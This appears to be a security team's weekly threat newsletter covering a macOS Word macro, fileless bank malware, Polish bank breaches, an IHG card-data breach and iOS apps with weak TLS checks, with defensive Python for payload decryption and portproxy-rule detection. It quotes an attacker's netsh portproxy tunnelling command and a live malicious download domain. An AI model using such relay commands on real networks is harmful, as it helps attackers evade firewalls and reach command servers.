Here are this week's cyber updates:
(1) Microsoft Office lets users embed a macro script that runs when a document is opened. While this is normally used to automate calculations and document tasks, attackers have abused it to execute malicious code on their victims' workstations, in particular to infect them with ransomware (such as Locky).
Today, the first Word macro targeting macOS was discovered in the wild. The macro downloads a second-stage file from https://www.securitychecking.org/index.asp, decrypts it (the file is RC4-encrypted) and then executes the decrypted payload.
Organizations that run macOS systems are requested to check whether any machine has resolved the following malicious domain: www.securitychecking.org
Here are all the details: https://objective-see.com/blog/blog_0x17.html
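As an added example (not code from the Objective-See write-up, nor from the malware itself): RC4 is symmetric and has no secret beyond its key, so once the key is recovered from the macro an analyst can decrypt the downloaded blob offline and triage what the second stage is before anything is executed. The key, the sample blob and the helper names (rc4_crypt, triage_payload) below are constructed for illustration; the real sample's key is not given on this page.

```python
# Added example, not code from the Objective-See write-up or from the malware.
# RC4 as an analyst would apply it to recover the second stage of a sample that
# downloads an RC4-encrypted blob and executes it. Key and blob are constructed.

def rc4_ksa(key):
    """RC4 key scheduling: build the 256-byte permutation S from the key."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    return s


def rc4_crypt(key, data):
    """RC4 keystream XOR; the same call encrypts and decrypts."""
    s = rc4_ksa(key)
    i = j = 0
    out = bytearray()
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


MACHO_MAGICS = (
    b"\xfe\xed\xfa\xce", b"\xce\xfa\xed\xfe",  # 32-bit Mach-O, both byte orders
    b"\xfe\xed\xfa\xcf", b"\xcf\xfa\xed\xfe",  # 64-bit Mach-O
    b"\xca\xfe\xba\xbe",                        # fat / universal binary
)


def triage_payload(blob):
    """Rough classification of a decrypted stage: did the key work, and what is it?"""
    if blob[:4] in MACHO_MAGICS:
        return "mach-o"
    if blob.startswith(b"#!"):
        return "script"
    try:
        blob.decode("ascii")
        return "text"
    except UnicodeDecodeError:
        return "unknown (wrong key or packed)"


# Constructed sample: a stand-in stage 2 encrypted with a made-up key.
SAMPLE_KEY = b"constructed-key"
SAMPLE_BLOB = rc4_crypt(SAMPLE_KEY, b"#!/usr/bin/env python\nprint('stage 2')\n")

if __name__ == "__main__":
    stage2 = rc4_crypt(SAMPLE_KEY, SAMPLE_BLOB)
    print(triage_payload(stage2))  # script
```

The triage step matters because a wrong key still yields output of the right length; checking for a recognisable header (Mach-O magic, a shebang, or at least printable text) is the quickest way to tell a correct decryption from garbage.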
(2) Numerous banks worldwide have been targeted by malware that resides only in memory, with nothing written to disk. Kaspersky reported that its incident response team was called in after Meterpreter code was found in the memory of a bank's domain controller.
What's interesting about this attack is that the attackers used the built-in netsh.exe utility to tunnel traffic from the victim's host to the attackers' C&C servers. In particular, the following command was used:
netsh interface portproxy add v4tov4 listenport=4444 connectaddress=<IP> connectport=8080 listenaddress=0.0.0.0
This makes the infected machine listen on TCP port 4444 and forward every connection it receives there to <IP> on port 8080.
Thus a legitimate tool (netsh.exe) was used to relay traffic from internal workstations and servers to an external C&C server through the infected host, even where direct connections from those internal machines to the internet are blocked by the organization's firewall.
Here are some artifacts left in the Windows registry that will quickly allow an organization to determine whether one of its machines was infected:
- HKLM\SYSTEM\ControlSet001\services\ – modified when the sc.exe utility is used to create or change a service
- HKLM\SYSTEM\ControlSet001\services\PortProxy\v4tov4\tcp – modified when a netsh.exe portproxy rule is added
Here are all the details: https://securelist.com/blog/research/77403/fileless-attacks-against-enterprise-networks/, http://thehackernews.com/2017/02/bank-hacking-malware.html
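As an added example (not code from the Securelist or The Hacker News write-ups): the portproxy rule above survives in two places an investigator can collect at scale, the live output of `netsh interface portproxy show all` and the PortProxy\v4tov4\tcp registry key. The parser below reads both forms and flags rules that forward to a non-internal address or listen on every interface. The sample output, the .reg excerpt and the value layout `"listenaddr/listenport"="connectaddr/connectport"` are constructed/assumed from exports I have seen, not taken from the original reports; the external address is a TEST-NET value.

```python
import ipaddress
import re
from collections import namedtuple

# Added example, not code from the Securelist write-up. Triage of netsh portproxy
# artifacts from (a) `netsh interface portproxy show all` output and (b) a .reg
# export of HKLM\SYSTEM\CurrentControlSet\Services\PortProxy\v4tov4\tcp.
# All sample input is constructed; the registry value layout is an assumption.

Proxy = namedtuple("Proxy", "listen_addr listen_port connect_addr connect_port")

# Address space treated as internal (RFC 1918 plus loopback). Assumption: a
# portproxy rule pointing anywhere else is a candidate C&C relay.
INTERNAL_NETS = [ipaddress.ip_network(n) for n in
                 ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8")]


def parse_netsh_show_all(text):
    """Parse the v4tov4 rows of `netsh interface portproxy show all`."""
    rows = []
    for line in text.splitlines():
        parts = line.split()
        # Header, separator and blank lines never have two numeric port columns.
        if len(parts) != 4 or not (parts[1].isdigit() and parts[3].isdigit()):
            continue
        rows.append(Proxy(parts[0], int(parts[1]), parts[2], int(parts[3])))
    return rows


# Assumed .reg layout: "listenaddr/listenport"="connectaddr/connectport"
REG_VALUE = re.compile(r'^"(?P<la>[^/"]+)/(?P<lp>\d+)"="(?P<ca>[^/"]+)/(?P<cp>\d+)"')


def parse_portproxy_reg(text):
    """Parse value lines of a .reg export of the PortProxy\\v4tov4\\tcp key."""
    rows = []
    for line in text.splitlines():
        m = REG_VALUE.match(line.strip())
        if m:
            rows.append(Proxy(m["la"], int(m["lp"]), m["ca"], int(m["cp"])))
    return rows


def is_internal(addr):
    try:
        ip = ipaddress.ip_address(addr)
    except ValueError:
        return False  # a hostname or '*' cannot be vetted offline; treat as suspicious
    return any(ip in net for net in INTERNAL_NETS)


def suspicious(proxies):
    """Return (proxy, reason) pairs for rules that look like a C&C relay."""
    findings = []
    for p in proxies:
        reasons = []
        if not is_internal(p.connect_addr):
            reasons.append("forwards to non-internal address")
        if p.listen_addr in ("0.0.0.0", "*"):
            reasons.append("listens on all interfaces")
        if reasons:
            findings.append((p, "; ".join(reasons)))
    return findings


# Constructed sample output of `netsh interface portproxy show all`.
SAMPLE_NETSH = """\
Listen on ipv4:             Connect to ipv4:

Address         Port        Address         Port
--------------- ----------  --------------- ----------
0.0.0.0         4444        203.0.113.5     8080
10.0.0.12       3389        10.0.0.40       3389
"""

# Constructed .reg export of the same rule.
SAMPLE_REG = r"""Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\PortProxy\v4tov4\tcp]
"0.0.0.0/4444"="203.0.113.5/8080"
"""

if __name__ == "__main__":
    for proxy, why in suspicious(parse_netsh_show_all(SAMPLE_NETSH)):
        print(f"{proxy.listen_addr}:{proxy.listen_port} -> "
              f"{proxy.connect_addr}:{proxy.connect_port}  [{why}]")
    for proxy, why in suspicious(parse_portproxy_reg(SAMPLE_REG)):
        print(f"registry: {proxy.listen_addr}:{proxy.listen_port} -> "
              f"{proxy.connect_addr}:{proxy.connect_port}  [{why}]")
```

The registry form is the one worth keeping in a hunt playbook: it can be pulled from an offline SYSTEM hive or a fleet-wide registry collection without running netsh on the suspect host, and the internal-to-internal rule in the sample shows why a simple "any portproxy rule" check would drown a team in legitimate RDP jump rules.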
(3) Several Polish banks have been hacked and information stolen by unknown attackers. Clients are advised to block access to the following hosts:
Here are all the details: https://badcyber.com/several-polish-banks-hacked-information-stolen-by-unknown-attackers/
(4) Last week I mentioned the ransomware that hit a hotel in Austria; this week it was IHG's turn to be hit by malware. Point-of-sale systems at about 12 InterContinental properties were compromised, allowing the attackers to steal payment card data.
The following link lists all affected properties: https://www.ihg.com/content/us/en/customer-care/protecting-our-guests. Be sure to check whether you've purchased anything there!
Here are all the details: https://krebsonsecurity.com/2017/02/intercontinental-confirms-breach-at-12-hotels/
(5) 76 popular iOS applications are vulnerable to MiTM attacks because they accept invalid TLS certificates; some are very widely used, such as Snapchat. An attacker on the network path can silently intercept the TLS-protected traffic and steal your credentials (username and password).
Here are all the details: https://medium.com/@chronic_9612/76-popular-apps-confirmed-vulnerable-to-silent-interception-of-tls-protected-data-2c9a2409dd1
Stay tuned for more updates,
Head of Offensive Security & Response Unit